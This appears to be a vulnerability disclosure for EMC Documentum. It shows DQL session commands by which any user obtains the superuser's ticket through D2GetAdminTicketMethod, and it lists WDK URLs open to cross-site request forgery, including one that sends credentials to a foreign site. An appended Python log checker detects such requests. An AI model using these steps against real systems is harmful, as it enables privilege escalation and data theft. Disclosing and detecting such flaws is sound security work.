documentum security vulnerabilities: D2GetAdminTicketMethod (D2)

Any user is able to execute D2GetAdminTicketMethod and obtain the superuser's ticket:

1> create c6_method_return object set message='test'
2> go
object_created
--------------
00002ee280000e9b
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b'
3> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002ee280000e9b'
2> go
message
--------------
DM_TICKET=T0.....
(1 row affected)

documentum security vulnerabilities: multiple XSRFs in WDK applications

The cross-site request forgery attack is fully described on Wikipedia; below is a list of URLs (or components) in WDK applications (such as Webtop, TaskSpace, EPFM, Documentum Administrator) that are vulnerable to XSRF:

DQL execution

  • /webtop/component/dqleditor?query=<query>
  • /webtop/component/appintxdql?query=<query>
  • /webtop/component/search?queryType=dql&query=<query>
  • /da/component/auditlist?query=<query>
  • /webtop/component/historicalactivityreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/processdetailreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/historicalprocessreportresults?query=<query>
  • /webtop/component/historicaluserreportresults?query=<query>
  • /webtop/action/view?objectId=<objectId of dm_query object> (executes /webtop/component/search?queryType=dql&query=<query>)
  • /webtop/action/search?queryType=dql&query=<query> (executes /webtop/component/search?queryType=dql&query=<query>)

other

  • /webtop/component/virtuallinkconnect?redirectUrl=http://url&virtualLinkPath=/webtop/component/main (sends the user's credentials to a foreign site; found in 6.7SP2)
  • /da/component/scsaveas?objectId=<objectId> (creates a copy of the object; could potentially be used to apply a less restrictive ACL to the copy)
  • /webtop/action/deletenotification?type=dm_notification&routerId=0000000000000000&objectId=<objectId> (deletes a dmi_queue_item object)
  • /webtop/action/demote?objectId=<objectId> (demotes a document)
  • /webtop/action/promote?objectId=<objectId> (promotes a document)

Components can be launched either directly (as in the examples above) or through a container:

  • /webtop/component/dialogcontainer?component=search&queryType=dql&query=<query>&componentArgs=

or through the appintgcontrollerlogin component:

  • /webtop/component/appintgcontrollerlogin?dispatchitem=search&dispatchtype=component&queryType=dql&query=<query>

Actions can be launched through ActionDispatcherServlet (as in the examples above) or through the actiondispatcher component:

  • /webtop/component/actiondispatcher?action=search&queryType=dql&query=<query>

or through any component:

  • /webtop/component/main?startupAction=search&queryType=dql&query=<query>
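A defender-side check for the launch paths listed above, added here as an example and not part of the original post: it resolves the container, appintgcontrollerlogin, actiondispatcher and startupAction indirections to the component or action actually executed, then flags requests to the listed DQL and state-changing endpoints that arrive without a same-origin Referer. The log format, the trusted host name and the log lines are constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not from the post). Fields: client method path status referer
SAMPLE_LOG = """\
10.0.0.5 GET /webtop/component/main?startupAction=search&queryType=dql&query=select+*+from+dm_user 200 http://evil.example/lure.html
10.0.0.5 GET /webtop/component/dialogcontainer?component=search&queryType=dql&query=select+user_name+from+dm_user&componentArgs= 200 -
10.0.0.7 GET /webtop/component/search?queryType=dql&query=select+*+from+dm_document 200 https://webtop.corp.example/webtop/component/main
10.0.0.9 GET /da/component/scsaveas?objectId=0900000180001234 200 http://evil.example/
10.0.0.9 GET /webtop/component/main 200 https://webtop.corp.example/webtop/
"""
APP_HOSTS = {"webtop.corp.example"}  # assumed trusted origin(s) of the WDK application
# Components/actions from the post whose "query" parameter executes DQL ...
DQL_TARGETS = {"dqleditor", "appintxdql", "search", "auditlist", "view",
               "historicalactivityreportresults", "processdetailreportresults",
               "historicalprocessreportresults", "historicaluserreportresults"}
# ... and the state-changing ones listed under "other".
STATE_TARGETS = {"virtuallinkconnect", "scsaveas", "deletenotification", "demote", "promote"}
# Indirect launch paths from the post: container/dispatcher -> parameter naming the real target.
INDIRECT = {"dialogcontainer": "component", "appintgcontrollerlogin": "dispatchitem",
            "actiondispatcher": "action", "main": "startupAction"}
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3}) (\S+)$")

def effective_target(path):
    """Return (component_or_action, params) after following one level of indirection."""
    url = urlparse(path)
    params = {k: v[0] for k, v in parse_qs(url.query).items()}
    name = url.path.rstrip("/").rsplit("/", 1)[-1]
    if name in INDIRECT and INDIRECT[name] in params:
        name = params[INDIRECT[name]]
    return name, params

def flag_requests(log_text):
    """Return (client, target, reason) for listed endpoints hit without a same-origin Referer."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, _status, referer = m.groups()
        target, params = effective_target(path)
        ref_host = urlparse(referer).hostname if referer != "-" else None
        if ref_host in APP_HOSTS:
            continue  # same-origin navigation, not a forgery candidate
        if target in DQL_TARGETS and "query" in params:
            findings.append((client, target, "cross-origin DQL execution"))
        elif target in STATE_TARGETS:
            findings.append((client, target, "cross-origin state change"))
    return findings
```

A missing Referer is treated as suspicious here, so clients or proxies that strip it will produce false positives; the check is a retrospective detection aid, not a substitute for anti-XSRF tokens in the application.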